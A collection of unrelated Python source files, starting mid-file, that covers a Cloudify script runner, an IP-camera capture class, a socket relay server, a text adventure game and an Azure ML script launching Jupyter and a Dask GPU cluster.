raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/Apache/tosca.interfaces.node.lifecycle.Standard/start/start_apache.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:start:{0}'.format(k)] = v
ctx.instance.runtime_properties['apache_url'] = r'http://' + get_attribute(ctx, 'public_ip_address') + r':' + r'80' + r'/'
ctx.instance.update()
|
terminal.py
|
# from KF.server_kalman_filter import Stack, Track
import numpy as np
# import dlib
import os, sys
import argparse
import requests
from multiprocessing import Process, Queue
import time
# Cloud Server
URL = 'http://yaolaoban.eva0.nics.cc:5000/detect'
# global variables
# this_file_path = os.path.dirname(os.path.abspath(__file__))
# imdb_name = 'Jumping'
# imdb_path = os.path.join(this_file_path, 'img', imdb_name)
# _, _, files = os.walk(imdb_path).next()
# img_count = len(files) - 1
i = 1
# Status variables
updated = False
def postIMG():
global i, updated
f = open(imdb_path+'/%04d.jpg'%i)
r = requests.post(url=URL, files={'img':f})
updtbox = r.json()['bbox']
updated = True
f.close()
def realtime_simulation(queue):
# Simulate new frames: take the frame counter off the queue, advance it, put it back
frame = queue.get()
while frame < 100:
frame += 1
queue.put(frame)
print 'New Frame', frame
time.sleep(0.04)
frame = queue.get()
if __name__ == '__main__':
q = Queue()
q.put(1)
print q.get()
q.put(2)
print q.get()
# p = Process(target=realtime_simulation, args=[q])
# p.start()
# print 'Started'
# p.join()
# print 'Joined'
|
Camera.py
|
# Camera Class
# Brandon Joffe
# 2016
#
# Copyright 2016, Brandon Joffe, All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import numpy as np
import cv2
import ImageUtils
import dlib
import openface
import os
import argparse
import logging
import SurveillanceSystem
import MotionDetector
import FaceDetector
#logging.basicConfig(level=logging.DEBUG,
# format='(%(threadName)-10s) %(message)s',
# )
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
fileDir = os.path.dirname(os.path.realpath(__file__))
modelDir = os.path.join(fileDir, '..', 'models')
dlibModelDir = os.path.join(modelDir, 'dlib')
openfaceModelDir = os.path.join(modelDir, 'openface')
parser = argparse.ArgumentParser()
parser.add_argument('--networkModel', type=str, help="Path to Torch network model.",
default=os.path.join(openfaceModelDir, 'nn4.small2.v1.t7'))
parser.add_argument('--imgDim', type=int,
help="Default image dimension.", default=96)
parser.add_argument('--cuda', action='store_true')
args = parser.parse_args()
CAPTURE_HZ = 30.0 # Determines frame rate at which frames are captured from IP camera
class IPCamera(object):
"""The IPCamera object continually captures frames
from a camera and makes these frames available for
proccessing and streamimg to the web client. A
IPCamera can be processed using 5 different processing
functions detect_motion, detect_recognise,
motion_detect_recognise, segment_detect_recognise,
detect_recognise_track. These can be found in the
SureveillanceSystem object, within the process_frame function"""
def __init__(self,camURL, cameraFunction, dlibDetection, fpsTweak):
os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;0"
logger.debug("Loading Stream From IP Camera: " + camURL)
self.motionDetector = MotionDetector.MotionDetector()
self.faceDetector = FaceDetector.FaceDetector()
self.processing_frame = None
self.tempFrame = None
self.captureFrame = None
self.streamingFPS = 0 # Streaming frame rate per second
self.processingFPS = 0
self.FPSstart = time.time()
self.FPScount = 0
self.motion = False # Used for alerts and transition between system states, i.e. from motion detection to face detection
self.people = {} # Holds person ID and corresponding person object
self.trackers = [] # Holds all alive trackers
self.cameraFunction = cameraFunction
self.dlibDetection = dlibDetection # Used to choose detection method for camera (dlib - True vs opencv - False)
self.fpsTweak = fpsTweak # used to know if we should apply the FPS work around when you have many cameras
self.rgbFrame = None
self.faceBoxes = None
self.captureEvent = threading.Event()
self.captureEvent.set()
self.peopleDictLock = threading.Lock() # Used to block concurrent access to people dictionary
print("prepare VideoCapture------------------------")
self.video = cv2.VideoCapture(camURL) # VideoCapture object used to capture frames from IP camera
#self.video.get()
print("video = cv2.VideoCapture------------------------")
logger.info("We are opening the video feed.")
self.videoError = False
self.url = camURL
if not self.video.isOpened():
print("not self.video.isOpened():-----------------------")
self.video.open()
print("Video feed opened------------------------")
logger.info("Video feed open.")
self.dump_video_info() # logging every specs of the video feed
# Start a thread to continuously capture frames.
# The capture thread ensures the frames being processed are up to date and are not old
self.captureLock = threading.Lock() # Sometimes used to prevent concurrent access
self.captureThread = threading.Thread(name='video_captureThread',target=self.get_frame)
self.captureThread.daemon = True
self.captureThread.start()
self.captureThread.stop = False
def __del__(self):
self.video.release()
def get_frame(self):
print("camera.get_frame_start")
logger.debug('Getting Frames')
FPScount = 0
warmup = 0
#fpsTweak = 0 # set that to 1 if you want to enable Brandon's fps tweak. that break most video feeds so recommend not to
FPSstart = time.time()
while True:
success, frame = self.video.read()
self.captureEvent.clear()
if success:
self.captureFrame = frame
self.captureEvent.set()
FPScount += 1
if FPScount == 5:
self.streamingFPS = 5/(time.time() - FPSstart)
FPSstart = time.time()
FPScount = 0
if self.fpsTweak:
if self.streamingFPS != 0: # If frame rate gets too fast slow it down, if it gets too slow speed it up
if self.streamingFPS > CAPTURE_HZ:
time.sleep(1/CAPTURE_HZ)
else:
time.sleep(self.streamingFPS/(CAPTURE_HZ*CAPTURE_HZ))
def read_jpg(self):
"""We are using Motion JPEG, and OpenCV captures raw images,
so we must encode it into JPEG in order to stream frames to
the client. It is nessacery to make the image smaller to
improve streaming performance"""
capture_blocker = self.captureEvent.wait()
frame = self.captureFrame
frame = ImageUtils.resize_mjpeg(frame)
ret, jpeg = cv2.imencode('.jpg', frame)
return jpeg.tostring()
def read_frame(self):
capture_blocker = self.captureEvent.wait()
frame = self.captureFrame
return frame
def read_processed(self):
frame = None
with self.captureLock:
frame = self.processing_frame
while frame is None: # If there are problems, keep retrying until an image can be read.
with self.captureLock:
frame = self.processing_frame
frame = ImageUtils.resize_mjpeg(frame)
ret, jpeg = cv2.imencode('.jpg', frame)
return jpeg.tostring()
def dump_video_info(self):
logger.info("---------Dumping video feed info---------------------")
logger.info("Position of the video file in milliseconds or video capture timestamp: ")
logger.info(self.video.get(cv2.CAP_PROP_POS_MSEC))
logger.info("0-based index of the frame to be decoded/captured next: ")
logger.info(self.video.get(cv2.CAP_PROP_POS_FRAMES))
logger.info("Relative position of the video file: 0 - start of the film, 1 - end of the film: ")
logger.info(self.video.get(cv2.CAP_PROP_POS_AVI_RATIO))
logger.info("Width of the frames in the video stream: ")
logger.info(self.video.get(cv2.CAP_PROP_FRAME_WIDTH))
logger.info("Height of the frames in the video stream: ")
logger.info(self.video.get(cv2.CAP_PROP_FRAME_HEIGHT))
logger.info("Frame rate:")
logger.info(self.video.get(cv2.CAP_PROP_FPS))
logger.info("4-character code of codec.")
logger.info(self.video.get(cv2.CAP_PROP_FOURCC))
logger.info("Number of frames in the video file.")
logger.info(self.video.get(cv2.CAP_PROP_FRAME_COUNT))
logger.info("Format of the Mat objects returned by retrieve() .")
logger.info(self.video.get(cv2.CAP_PROP_FORMAT))
logger.info("Backend-specific value indicating the current capture mode.")
logger.info(self.video.get(cv2.CAP_PROP_MODE))
logger.info("Brightness of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_BRIGHTNESS))
logger.info("Contrast of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_CONTRAST))
logger.info("Saturation of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_SATURATION))
logger.info("Hue of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_HUE))
logger.info("Gain of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_GAIN))
logger.info("Exposure (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_EXPOSURE))
logger.info("Boolean flags indicating whether images should be converted to RGB.")
logger.info(self.video.get(cv2.CAP_PROP_CONVERT_RGB))
logger.info("--------------------------End of video feed info---------------------")
|
run_integration_tests.py
|
from multiprocessing import Process, Manager, Queue
import time
import snekpro.api as api
from snekpro.integration_tests.mock_tag_pro_env import MockTagProExtMutliAgentEnv
def main():
print("Starting snekpro")
manager = Manager()
game_states = manager.list()
keypresses = Queue()
config = {"game_states": game_states, "keypresses": keypresses}
mock_tag_pro_env = MockTagProExtMutliAgentEnv(config)
api_process = Process(target=api.run, args=(game_states, keypresses))
env_process = Process(target=mock_tag_pro_env.run)
print("Starting API")
api_process.start()
time.sleep(5)
print("Starting agent")
env_process.start()
try:
time.sleep(60)
except KeyboardInterrupt:
print("Caught KeyboardInterrupt, terminating processes")
api_process.terminate()
api_process.join()
env_process.terminate()
env_process.join()
else:
print("Timeout, terminating processes")
api_process.terminate()
api_process.join()
env_process.terminate()
env_process.join()
if __name__ == "__main__":
main()
|
androidServer.py
|
import socket
import sys
import threading
class Server:
def __init__(self, port, relay):
self.port = port
self.running = False
self.thread = threading.Thread(target = self.__startServer)
self.thread.setDaemon(True) # dies with main thread
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind(('', port))
self.relay = relay
def __startServer(self):
self.sock.listen(1)
while self.running:
conn, addr = self.sock.accept()
print "connected to ", addr
isConnected = True
while(isConnected):
try:
buf = conn.recv(8)
if ord(buf[0]) == 1:
self.relay.switch()
except(socket.error, IndexError):
isConnected = False
print "disconnected from ", addr
if(isConnected):
conn.close()
def run(self):
self.running = True
self.thread.start()
def stop(self):
self.running = False
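# Example usage (assumes a relay object exposing switch(), as used above):
# server = Server(5000, relay)
# server.run() # accept connections in a daemon thread; byte 0x01 toggles the relay
# ...
# server.stop()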
|
game.py
|
# Hello, this is the main file
from advent import *
import time
import os
import __future__
import sys
import threading
game = Game()
def end(self, actor, noun, words):
print "\n\n\nWell done! \nYou completed the Libary Escape Game!\n\n\n"
time.sleep(2)
print """|@@@@| |####|
|@@@@| |####|
|@@@@| |####|
\@@@@| |####/
\@@@| |###/
`@@|_____|##'
(O)
.-'''''-.
.' * * * `.
: * * :
: ~ Libary ~ :
: ~ Escape ~ :
: * * :
`. * * * .'
`-.....-'\n\n\n"""
print "By James, Owen and Matthew"
def countdown():
floor3Key = corridoor.new_object("key", "Key to Floor 3")
floor3.make_requirement(floor3Key)
print("A key to the main floor 3 is now available. Use \"take key\"")
n = 30
while n > 0:
time.sleep(1)
n = n -1
if n == 0:
print("""You died!
.#@#';'+@@;
@; ```` ```` :@`
@,```````````````,@
@ ```````````````` @
`@ ````````````````````@
@ ````````````````````` @
::` ```````````````````` ;,
@`````````````````````````@
,+```````````````````````:`#`
@``.`````````````````````;`.#
@ ;`````````````````````+` @
@``.`````````````````````;``@
@`: ````````````````````. `@
@`@````` ````````````````,`.@
@ ,``` ` ` ```````````` @ '@
@``@.`` '+```` ` .:'+@ #'@`@
@ `@@` ,;;:+# ``@:` ``.`+ @
@, ' ` `.'. `#`` ;,+##'``';,@
##,``#@@@@@@, `#@@@@@@@:`+##
.@@`'@@@@@@@@ ``@@@@@@@@@ #@,
@@.@@@@@ .@@```@@@@@ +@@ @@
@@:+@@@@'#@@ `@@@@@@@@# @@@
.@@.:@@@@@@@'`@` @@@@@@#+`:+@
,@.,`'+@@@+:`:@@ ;+++'+ ` @
,@;`` :''.#``@@@;`` ,:``,@
`@# ``.`````@+@@ ``.;'` ` @
,@ ,. ``.``:@#@@ ;`` , @
.@@;+'````+@#@@ ```@+@@`
@'@@@``` `'`..`````@`#@
@,'@@ ` ` `` `.`+@ @@
@..@@#,`.., ` .'@@`.@
@.`@@;'@#+#'';#,.:@@`:@
@`;;@#@ ,;; .:`#@@@`;#
@`+`'+,#@#+,#+@@+.@+`++
@.:`@`#; `;'#'.+, ` #'
++#` `.`'#`,:#+,` ,``@.
@@ ```` `.,, `` @
:@ `` ```` ``` `` @;
'@ : ``````` +` @+
+@ `` ````` `.@;
@@ `````` #`.@:
@@`@` ``# ;@.
;@@@@@@@@@`
````
""")
os.execl(sys.executable, sys.executable, * sys.argv)
def start(self, actor, noun, words):
countdown_thread = threading.Thread(target=countdown)
countdown_thread.start()
def listen(self, actor, noun, words):
print " The lion asks: What is the worst vegetable to have on a ship?"
print "Enter answer"
global input
input = raw_input()
if "leek" in input.lower():
print "You Win. The frog drops a key. You can use \"take key\" to collect it."
side4key = side4.new_object("key", "Key to the Elevator")
corridoor.make_requirement(side4key)
elif "leak" in input.lower():
print "You Win. The frog drops a key. You can use \"take key\" to collect it."
side4key = side4.new_object("key", "Key to the Elevator")
corridoor.make_requirement(side4key)
else:
print "Try Again"
listen(0,0,0,0)
floor5 = game.new_location(
"Floor 5",
"""
__ _ __ ______
/ / (_) /_ _________ ________ __ / ____/_____________ _____ ___
/ / / / __ \/ ___/ __ `/ ___/ / / / / __/ / ___/ ___/ __ `/ __ \/ _ \
/ /___/ / /_/ / / / /_/ / / / /_/ / / /___(__ ) /__/ /_/ / /_/ / __/
/_____/_/_.___/_/ \__,_/_/ \__, / /_____/____/\___/\__,_/ .___/\___(_)
/____/ /_/
You are on floor five of a large library.
The place is deserted.
You cannot see the room.
Your laptop is on the floor below.
Commands - down
"""
)
floor4 = game.new_location(
"Floor 4",
"""
As soon as you reach the bottom of the stairs, a laptop on a table explodes into a sea of flames. There is a wooden door to the west. There is a staircase to floor 3, but it is locked. You don't have long before the fire spreads.
Commands - west
"""
)
side4 = game.new_location(
"Side Room",
"""
You are in a small side room, a lion is standing in its center.
Commands - listen, east
"""
)
corridoor = game.new_location(
"Corridoor",
"""
You have reached a corridor at the bottom of the stairs. The room ahead is very hot and you can't survive in there for very long. Type start, then get the key, then advance to the next room.
Commands - start then west
"""
)
floor3 = game.new_location(
"TOP MIDDLE MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
,,,,,,,,,,,,,,+@@@@@@@@@@@@',,,,,,,,,,,.+
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,`````````````,````````````;````````````'
,`````````````,````````````;````````````'
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
You are in the first room of a large maze.
"""
)
tlmaze = game.new_location(
"TOP LEFT MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@;:,,,,,,,,,,,.',,,,,,,,,,,.+
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,`````````````,````````````;````````````'
,`````````````,````````````;````````````'
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
trmaze = game.new_location(
"TOP RIGHT MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
,,,,,,,,,,,,,,:,,,,,,,,,,,.@@@@@@@@@@@@@+
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,`````````````,````````````;````````````'
,`````````````,````````````;````````````'
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
mlmaze = game.new_location(
"MIDDLE LEFT MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,,,,,,,,,,,,,,:,,,,,,,,,,,.',,,,,,,,,,,.+
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@,````````````;````````````'
,`````````````,````````````;````````````'
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
mmmaze = game.new_location(
"MIDDLE MIDDLE MAZE ROOM",
"""
:
: ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: :,,,,,,,,,,,,+,,,,,,,,,,,,#,,,,,,,,,,,,@
: , @@@@@@@@@@@@@# @
: , @@@@@@@@@@@@@# @
: , @@@@@@@@@@@@@# @
: , @@@@@@@@@@@@@# @
: , @@@@@@@@@@@@@# @
: , @@@@@@@@@@@@@# @
: , @@#@@@@@@@@@@# @
: , @@.@@@#;@+;@@# @
: , @@.@@#,@'`@'@# @
: , @@.@@#.@+.@'@# @
: , @@@ Lion @@# @
: , @@@@@@@@@@@@@# @
: ,````````````@@@@@@@@@@@@@#````````````@
: ,````````````+````````````#````````````@
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
:
"""
)
mrmaze = game.new_location(
"MIDDLE RIGHT MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,,,,,,,,,,,,,,:,,,,,,,,,,,.',,,,,,,,,,,.+
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
,`````````````,````````````@@@@@@@@@@@@@'
,`````````````,````````````;````````````'
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
brmaze = game.new_location(
"BOTTOM RIGHT MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,,,,,,,,,,,,,,:,,,,,,,,,,,.',,,,,,,,,,,.+
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,`````````````,````````````;````````````'
,`````````````,````````````@@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@:;;@@@+@@@@'
, , @@:'+#@+:##@@'
, , Exit '
, , @@;`.,@.;@.@@'
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
blmaze = game.new_location(
"BOTTOM LEFT MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,,,,,,,,,,,,,,:,,,,,,,,,,,.',,,,,,,,,,,.+
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,`````````````,````````````;````````````'
,@@@@@@@@@@@@@,````````````;````````````'
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@`;'@@@'+@@@, ; '
,@@`'#;#@`+#@@, ; '
,@@`@@@`@`+@@@, ; '
,@@.` EXIT @@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
bmmaze = game.new_location(
"BOTTOM MIDDLE MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,,,,,,,,,,,,,,:,,,,,,,,,,,.',,,,,,,,,,,.+
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,`````````````,````````````;````````````'
,`````````````@@@@@@@@@@@@@;````````````'
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
floor1 = game.new_location(
"Floor 1",
"""
Type END\
""")
stairs = game.new_connection("Stairs", floor5, floor4, [IN, DOWN], [UP, OUT])
fire_escape = game.new_connection("Side Room", floor4, side4, [IN, WEST], [EAST, OUT])
floor3stairs = game.new_connection("Stairs", floor4, corridoor, [IN, DOWN], [UP, OUT])
corridorrFloor3 = game.new_connection("Continue to Floor 3", corridoor, floor3, [IN, WEST], [EAST, OUT])
maze1 = game.new_connection("Maze 1", floor3, tlmaze, [IN, WEST], [EAST, OUT])
maze2 = game.new_connection("Maze 2", floor3, trmaze, [IN, EAST], [WEST, OUT])
maze3 = game.new_connection("Maze 3", mlmaze, tlmaze, [IN, NORTH], [SOUTH, OUT])
maze4 = game.new_connection("Maze 4", mmmaze, floor3, [IN, NORTH], [SOUTH, OUT])
maze5 = game.new_connection("Maze 5", mrmaze, trmaze, [IN, NORTH], [SOUTH, OUT])
maze6 = game.new_connection("Maze 6", mlmaze, mmmaze, [IN, EAST], [WEST, OUT])
maze7 = game.new_connection("Maze 7", mrmaze, mmmaze, [IN, WEST], [EAST, OUT])
maze8 = game.new_connection("Maze 8", blmaze, mlmaze, [IN, NORTH], [SOUTH, OUT])
maze9 = game.new_connection("Maze 9", bmmaze, mmmaze, [IN, NORTH], [SOUTH, OUT])
maze10 = game.new_connection("Maze 10", brmaze, mrmaze, [IN, NORTH], [SOUTH, OUT])
maze11 = game.new_connection("Maze 11", blmaze, bmmaze, [IN, EAST], [WEST, OUT])
maze12 = game.new_connection("Maze 12", brmaze, bmmaze, [IN, WEST], [EAST, OUT])
maze13 = game.new_connection("Maze 13", blmaze, floor5, [IN, SOUTH], [NORTH, OUT])
maze14 = game.new_connection("Maze 14", brmaze, floor1, [IN, SOUTH], [NORTH, OUT])
user = game.new_player(floor5)
user.add_verb(Verb(listen, "listen"))
user.add_verb(Verb(start, "start"))
user.add_verb(Verb(end, "end"))
game.run()
|
init_dask.py
|
import sys
import argparse
import time
import threading
import subprocess
import socket
import os  # needed for setting CUDA_VISIBLE_DEVICES below
from mpi4py import MPI
from azureml.core import Run
from notebook.notebookapp import list_running_servers
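# Pump a child process's stdout line by line to both our stdout and a log file,
# returning once the process has exited and its output is drained.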
def flush(proc, proc_log):
while True:
proc_out = proc.stdout.readline()
if proc_out == '' and proc.poll() is not None:
proc_log.close()
break
elif proc_out:
sys.stdout.write(proc_out)
proc_log.write(proc_out)
proc_log.flush()
if __name__ == '__main__':
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
ip = socket.gethostbyname(socket.gethostname())
parser = argparse.ArgumentParser()
parser.add_argument("--datastore")
parser.add_argument("--n_gpus_per_node")
parser.add_argument("--jupyter_token")
args = parser.parse_args()
    n_gpus_per_node = int(args.n_gpus_per_node)  # parse as int rather than eval'ing the argument
print("number of GPUs per node:", n_gpus_per_node)
print("- my rank is ", rank)
print("- my ip is ", ip)
if rank == 0:
cluster = {
"scheduler" : ip + ":8786",
"dashboard" : ip + ":8787"
}
scheduler = cluster["scheduler"]
dashboard = cluster["dashboard"]
else:
cluster = None
cluster = comm.bcast(cluster, root=0)
scheduler = cluster["scheduler"]
dashboard = cluster["dashboard"]
if rank == 0:
Run.get_context().log("headnode", ip)
Run.get_context().log("cluster",
"scheduler: {scheduler}, dashboard: {dashboard}".format(scheduler=cluster["scheduler"],
dashboard=cluster["dashboard"]))
Run.get_context().log("datastore", args.datastore)
cmd = ("jupyter lab --ip 0.0.0.0 --port 8888" + \
" --NotebookApp.token={token}" + \
" --allow-root --no-browser").format(token=args.jupyter_token)
jupyter_log = open("jupyter_log.txt", "a")
jupyter_proc = subprocess.Popen(cmd.split(), universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
jupyter_flush = threading.Thread(target=flush, args=(jupyter_proc, jupyter_log))
jupyter_flush.start()
while not list(list_running_servers()):
time.sleep(5)
jupyter_servers = list(list_running_servers())
assert (len(jupyter_servers) == 1), "more than one jupyter server is running"
Run.get_context().log("jupyter",
"ip: {ip_addr}, port: {port}".format(ip_addr=ip, port=jupyter_servers[0]["port"]))
Run.get_context().log("jupyter-token", jupyter_servers[0]["token"])
cmd = "dask-scheduler " + "--port " + scheduler.split(":")[1] + " --dashboard-address " + dashboard
scheduler_log = open("scheduler_log.txt", "w")
scheduler_proc = subprocess.Popen(cmd.split(), universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
os.environ["CUDA_VISIBLE_DEVICES"] = str(list(range(n_gpus_per_node))).strip("[]")
cmd = "dask-cuda-worker " + scheduler + " --memory-limit 0"
worker_log = open("worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(cmd.split(), universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
worker_flush = threading.Thread(target=flush, args=(worker_proc, worker_log))
worker_flush.start()
flush(scheduler_proc, scheduler_log)
else:
os.environ["CUDA_VISIBLE_DEVICES"] = str(list(range(n_gpus_per_node))).strip("[]")
cmd = "dask-cuda-worker " + scheduler + " --memory-limit 0"
worker_log = open("worker_{rank}_log.txt".format(rank=rank), "w")
